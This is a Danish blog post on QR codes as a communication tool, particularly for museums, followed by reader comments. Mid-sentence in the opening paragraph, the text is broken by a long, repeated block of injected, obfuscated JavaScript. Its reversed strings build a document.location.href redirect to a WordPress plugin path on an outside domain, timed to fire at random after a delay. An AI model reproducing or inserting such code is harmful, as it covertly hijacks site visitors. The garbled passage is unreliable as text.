QR koder som formidlingsværktøj

Hvad kan man bruge QR koder til – og hvordan?

Vi ser QR koder overalt på plakater, i blade, på klistermærker og på produkterne i supermarkedet. Men fungerer det? Ifølge en undersøgelse Coop-Danmark foretoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tog i 2012 scanner kun 3% af smartphone-ejere regelmæssigt en QR kode. Det er ærgerligt, når nu QR koder giver os mulighed for at viderebringe information uden at klistre potentielt forstyrrende plancher eller plakater op. Hvis man forestiller sig valget mellem 2 forskellige QR koder, hvilken information vil du så have? Den korte eller den lange eller måske ønsker du at dele med dine venner? Med QR koder kan der opstå helt forskellige oplevelser alt efter hvilken QR kode der scannes.

Men hvorfor fungerer QR koder ikke? Et grundlæggende problem er at QR koder ikke bliver forklaret ordentligt. Derved kommer brugeren i tvivl om hvorfor de skal scanne. Et andet problem er også at QR koder er blevet brugt uhensigtsmæssigt. Dette har skabt mistillid til QR koderne. Endvidere er der endnu ikke skabt et behov hos brugeren for at bruge QR koder. Det er nemt at ignorere QR koder og ikke føle man går glip af noget.

Derfor skal der arbejdes for at befolkningen bliver interesseret i QR koder og kan se et formål. Scanner man en QR kode i dag, ender man alt for tit på en kedelig hjemmeside.

Hvordan gør vi? Når en QR kode sættes op, skal det være tydeligt for brugeren hvad de kan forvente. Kan de forvente at blive overrasket? Og bliver de så faktisk overraskede? Der må også vejledes i hvordan man scanner en QR kode, således at alle tør give sig i kast med det. Bag QR koden kan der gemme sig alt muligt, men der være et formål, og der skal være en gevinst for brugeren.

Museer i Danmark er i gang med at benytte sig af QR kodens muligheder, særligt til formidling uden for museets fysiske rammer. Derved rækker museet længere og bredere, da muligheden for at nå personer som ikke nødvendigvis er traditionelle museums brugere, er skabt. Med QR koder skabes der mulighed for at kommunikere på mange niveauer på en gang. I stedet for at have en lille tekst ved hver genstand i en udstilling, kan der placeres en QR kode, som kan gemme på alt. Derved skaber man en neutral platform, som giver magten til brugeren. Selvfølgelig gives der dermed også et ansvar, som vi kun i kan håbe, at brugeren kan håndtere. Måske kan det skabe større glæde ved museumsbesøget, at de kan vælge ”kun” at kigge, eller at få mere information. Uanset hvad: valget er deres.

4 comments to “QR koder som formidlingsværktøj”
    • Hej Daniel
      Jeg kender ikke til nogen kampanger som har rykket stort ved opfattelsen af QR koder i Danmark. I udlandet, særligt i Sydkorea, har de taget QR koder til sig. Supermarkedskæderne Emart og Tesco har haft succes med kampagner med QR koder.

  1. Problemet med QR koder er at de er blevet gennemtæsket af reklamebranchen, og efter min mening ikke signalerer faglighed. Vi benytter i stedet Vuforia Tags, som kan bestå af et billede hvor der kun er diskrete kodeinformationer i kanten, til mobile formidlingsprojekter. Ulempen er selvfølgelig at man skal ud og lave en “rigtig App” – men det er ikke så dyrt som det har været, og så har man fuld kontrol over brugeroplevelsen…

  2. Hej Ida,

    God vinkel på brugen af QR-koder og nogle af faldgrupperne,

    QR-koder er naturligvis kun et værktøj til at gøre annoncer, indhold mv. interaktivt. En QR-kode i sig selv kan derfor ikke ‘bebrejdes’ hvis man ikke opnår det ønskede antal scan, det må være implementeringen og eksekveringen der halter.

    Derfor er det godt der fremhæves mulige årsager til lavt antal scan af QR-koderne du omtaler.

    I denne artikel er der et par ekstra gode råd i forbindelse med QR-koder

    http://www.m-marketing.dk/nyheder.php?type=artikel&id=bryd_koden_og_vind_kunder

Skriv et svar